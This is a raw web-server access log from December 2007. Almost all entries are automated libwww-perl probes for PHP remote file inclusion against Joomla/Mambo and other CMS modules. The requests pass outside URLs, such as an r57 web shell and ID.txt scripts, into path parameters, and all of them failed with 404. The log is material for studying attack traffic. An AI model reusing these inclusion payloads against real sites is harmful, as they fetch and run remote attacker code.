207.182.253.124 - - [02/Dec/2007:18:02:38 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.182.253.124 - - [02/Dec/2007:18:02:38 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
8.4.9.191 - - [02/Dec/2007:18:02:38 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.182.253.124 - - [02/Dec/2007:18:02:38 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.182.253.124 - - [02/Dec/2007:18:02:38 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.182.253.124 - - [02/Dec/2007:18:02:38 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.182.253.124 - - [02/Dec/2007:18:02:38 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
8.4.9.191 - - [02/Dec/2007:18:02:38 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
8.4.9.191 - - [02/Dec/2007:18:02:38 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.236.82 - - [02/Dec/2007:18:02:43 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.236.82 - - [02/Dec/2007:18:02:43 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.236.82 - - [02/Dec/2007:18:02:43 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.236.82 - - [02/Dec/2007:18:02:43 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.236.82 - - [02/Dec/2007:18:02:43 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.236.82 - - [02/Dec/2007:18:02:43 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.234.150.184 - - [02/Dec/2007:18:03:09 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.150.184 - - [02/Dec/2007:18:03:09 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.150.184 - - [02/Dec/2007:18:03:09 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.150.184 - - [02/Dec/2007:18:03:09 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
85.234.150.184 - - [02/Dec/2007:18:03:10 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
85.234.150.184 - - [02/Dec/2007:18:03:10 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.11.218 - - [02/Dec/2007:18:03:11 -0800] "GET /logs/access_070903.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.altersrente.de/banner/.../about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.232.11.218 - - [02/Dec/2007:18:03:11 -0800] "GET /logs/access_070903.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.altersrente.de/banner/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
67.15.194.140 - - [02/Dec/2007:18:03:15 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.194.140 - - [02/Dec/2007:18:03:15 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.194.140 - - [02/Dec/2007:18:03:15 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
8.4.9.191 - - [02/Dec/2007:18:03:30 -0800] "GET /logs/access_070827.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.182.253.124 - - [02/Dec/2007:18:03:35 -0800] "GET /logs/access_070827.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.246.98 - - [02/Dec/2007:18:03:38 -0800] "GET /logs/access_070827.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.182.253.124 - - [02/Dec/2007:18:03:38 -0800] "GET /logs/access_070827.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.93.236.82 - - [02/Dec/2007:18:03:39 -0800] "GET /logs/access_070827.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.236.82 - - [02/Dec/2007:18:03:42 -0800] "GET /logs/access_070827.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
189.70.60.52 - - [02/Dec/2007:18:03:51 -0800] "POST /logs//xmlrpc.php HTTP/1.1" 404 275 "-" "-" "www.galf.org"
85.38.61.251 - - [02/Dec/2007:18:03:58 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://open.highpoint.edu/geeklog/plugins/jst/sei/.un/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
189.70.60.52 - - [02/Dec/2007:18:04:11 -0800] "POST /logs//xmlrpc.php HTTP/1.1" 404 275 "-" "-" "www.galf.org"
85.234.150.184 - - [02/Dec/2007:18:04:16 -0800] "GET /logs/access_070827.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
85.234.150.184 - - [02/Dec/2007:18:04:16 -0800] "GET /logs/access_070827.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
189.70.60.52 - - [02/Dec/2007:18:04:22 -0800] "POST /logs//xmlrpc.php HTTP/1.1" 404 275 "-" "-" "www.galf.org"
189.70.60.52 - - [02/Dec/2007:18:04:33 -0800] "POST /logs//xmlrpc.php HTTP/1.1" 404 275 "-" "-" "www.galf.org"
67.15.194.140 - - [02/Dec/2007:18:04:35 -0800] "GET /logs/access_070827.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
189.70.60.52 - - [02/Dec/2007:18:04:43 -0800] "POST /logs//xmlrpc.php HTTP/1.1" 404 275 "-" "-" "www.galf.org"
189.70.60.52 - - [02/Dec/2007:18:04:47 -0800] "POST /logs//xmlrpc.php HTTP/1.1" 404 275 "-" "-" "www.galf.org"
85.38.61.251 - - [02/Dec/2007:18:04:52 -0800] "GET /logs/access_070625.log//modules/agendax/addevent.inc.php?agendax_path=http://open.highpoint.edu/geeklog/plugins/jst/sei/.un/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.38.61.251 - - [02/Dec/2007:18:04:53 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://open.highpoint.edu/geeklog/plugins/jst/sei/.un/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.38.61.251 - - [02/Dec/2007:18:04:54 -0800] "GET /logs/access_070917.log//modules/agendax/addevent.inc.php?agendax_path=http://open.highpoint.edu/geeklog/plugins/jst/sei/.un/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.38.61.251 - - [02/Dec/2007:18:04:55 -0800] "GET /logs/access_071014.log//modules/agendax/addevent.inc.php?agendax_path=http://open.highpoint.edu/geeklog/plugins/jst/sei/.un/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
189.70.60.52 - - [02/Dec/2007:18:04:58 -0800] "POST /logs//xmlrpc.php HTTP/1.1" 404 275 "-" "-" "www.galf.org"
189.70.60.52 - - [02/Dec/2007:18:05:08 -0800] "POST /logs//xmlrpc.php HTTP/1.1" 404 275 "-" "-" "www.galf.org"
202.60.74.106 - - [02/Dec/2007:18:05:17 -0800] "GET /logs/scripts.log/index.php3?id=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.60.74.106 - - [02/Dec/2007:18:05:18 -0800] "GET /logs/index.php3?id=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
189.70.60.52 - - [02/Dec/2007:18:05:19 -0800] "POST /logs//xmlrpc.php HTTP/1.1" 404 275 "-" "-" "www.galf.org"
193.224.194.70 - - [02/Dec/2007:18:05:26 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
193.224.194.70 - - [02/Dec/2007:18:05:26 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.224.194.70 - - [02/Dec/2007:18:05:27 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.3.238.151 - - [02/Dec/2007:18:06:40 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.l1nk3d.kit.net/r57.1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.238.151 - - [02/Dec/2007:18:06:41 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.l1nk3d.kit.net/r57.1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.151.48.18 - - [02/Dec/2007:18:06:48 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.151.48.18 - - [02/Dec/2007:18:06:54 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.151.48.18 - - [02/Dec/2007:18:06:54 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.224.194.70 - - [02/Dec/2007:18:06:57 -0800] "GET /logs/access_070827.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.58.205.45 - - [02/Dec/2007:18:07:10 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.58.205.45 - - [02/Dec/2007:18:07:10 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.58.205.45 - - [02/Dec/2007:18:07:11 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.27.152.18 - - [02/Dec/2007:18:07:44 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
213.27.152.18 - - [02/Dec/2007:18:07:44 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.27.152.18 - - [02/Dec/2007:18:07:44 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.27.152.18 - - [02/Dec/2007:18:08:03 -0800] "GET /logs/access_071119.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
189.70.60.52 - - [02/Dec/2007:18:08:08 -0800] "POST /logs//xmlrpc.php HTTP/1.1" 404 275 "-" "-" "www.galf.org"
219.94.129.87 - - [02/Dec/2007:18:08:40 -0800] "GET /logs/access_071112.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://sagasufx.com/rulez.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
219.94.129.87 - - [02/Dec/2007:18:08:40 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://sagasufx.com/rulez.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
219.94.129.87 - - [02/Dec/2007:18:08:41 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://sagasufx.com/rulez.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.236.82 - - [02/Dec/2007:18:09:04 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
69.93.236.82 - - [02/Dec/2007:18:09:05 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.236.82 - - [02/Dec/2007:18:09:05 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.236.82 - - [02/Dec/2007:18:09:05 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.58.205.45 - - [02/Dec/2007:18:09:05 -0800] "GET /logs/access_071119.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
189.70.60.52 - - [02/Dec/2007:18:09:07 -0800] "POST /logs//xmlrpc.php HTTP/1.1" 404 275 "-" "-" "www.galf.org"
189.70.60.52 - - [02/Dec/2007:18:09:29 -0800] "POST /logs//xmlrpc.php HTTP/1.1" 404 275 "-" "-" "www.galf.org"
72.232.246.98 - - [02/Dec/2007:18:09:51 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.232.246.98 - - [02/Dec/2007:18:09:51 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.249.84.15 - - [02/Dec/2007:18:09:54 -0800] "GET / HTTP/1.1" 200 1048 "http://www.google.com/search?q=abc" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.galf.org"
193.151.48.18 - - [02/Dec/2007:18:09:57 -0800] "GET /logs/access_070827.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
219.94.129.87 - - [02/Dec/2007:18:10:22 -0800] "GET /logs/access_071022.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://sagasufx.com/rulez.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
209.200.255.149 - - [02/Dec/2007:18:11:01 -0800] "GET /logs/access_071001.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.200.255.149 - - [02/Dec/2007:18:11:01 -0800] "GET /logs/access_071001.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
8.4.9.191 - - [02/Dec/2007:18:11:22 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
8.4.9.191 - - [02/Dec/2007:18:11:22 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
213.189.224.45 - - [02/Dec/2007:18:11:49 -0800] "GET /logs/access_070917.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.geocities.com/myachap/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.189.224.45 - - [02/Dec/2007:18:11:50 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.geocities.com/myachap/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.189.224.45 - - [02/Dec/2007:18:11:50 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.geocities.com/myachap/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.234.150.184 - - [02/Dec/2007:18:12:09 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.150.184 - - [02/Dec/2007:18:12:09 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
85.234.150.184 - - [02/Dec/2007:18:12:13 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.150.184 - - [02/Dec/2007:18:12:14 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.3.238.151 - - [02/Dec/2007:18:12:18 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.l1nk3d.kit.net/r57.1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.238.151 - - [02/Dec/2007:18:12:18 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.l1nk3d.kit.net/r57.1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.189.224.45 - - [02/Dec/2007:18:12:23 -0800] "GET /logs/access_071105.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.geocities.com/myachap/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.3.238.151 - - [02/Dec/2007:18:12:29 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.l1nk3d.kit.net/r57.1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.238.151 - - [02/Dec/2007:18:12:29 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.l1nk3d.kit.net/r57.1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:18:13:32 -0800] "GET /logs/access_071014.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.44.232.41 - - [02/Dec/2007:18:13:35 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.232.41 - - [02/Dec/2007:18:13:37 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:18:13:40 -0800] "GET /logs/access_071014.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.194.140 - - [02/Dec/2007:18:13:42 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.194.140 - - [02/Dec/2007:18:13:42 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.44.232.41 - - [02/Dec/2007:18:13:43 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.232.41 - - [02/Dec/2007:18:13:43 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.27.152.18 - - [02/Dec/2007:18:13:46 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
213.27.152.18 - - [02/Dec/2007:18:13:47 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.3.238.151 - - [02/Dec/2007:18:14:36 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.l1nk3d.kit.net/r57.1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.238.151 - - [02/Dec/2007:18:14:36 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.l1nk3d.kit.net/r57.1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.60.74.106 - - [02/Dec/2007:18:22:28 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.60.74.106 - - [02/Dec/2007:18:22:28 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
209.200.255.149 - - [02/Dec/2007:18:22:34 -0800] "GET /logs/access_070903.log//modules/4nAlbum/public/displayCategory.php?basepath=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.224.194.70 - - [02/Dec/2007:18:23:12 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.224.194.70 - - [02/Dec/2007:18:23:13 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.200.255.149 - - [02/Dec/2007:18:24:06 -0800] "GET /logs/access_070827.log//modules/4nAlbum/public/displayCategory.php?basepath=http://robbiehontele.com/berlijn/images/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.3.238.151 - - [02/Dec/2007:18:26:31 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.l1nk3d.kit.net/r57.1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.238.151 - - [02/Dec/2007:18:26:31 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.l1nk3d.kit.net/r57.1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.238.151 - - [02/Dec/2007:18:27:26 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.l1nk3d.kit.net/r57.1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.238.151 - - [02/Dec/2007:18:27:26 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.l1nk3d.kit.net/r57.1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
72.3.238.151 - - [02/Dec/2007:18:27:50 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.l1nk3d.kit.net/r57.1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.3.238.151 - - [02/Dec/2007:18:27:50 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.l1nk3d.kit.net/r57.1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
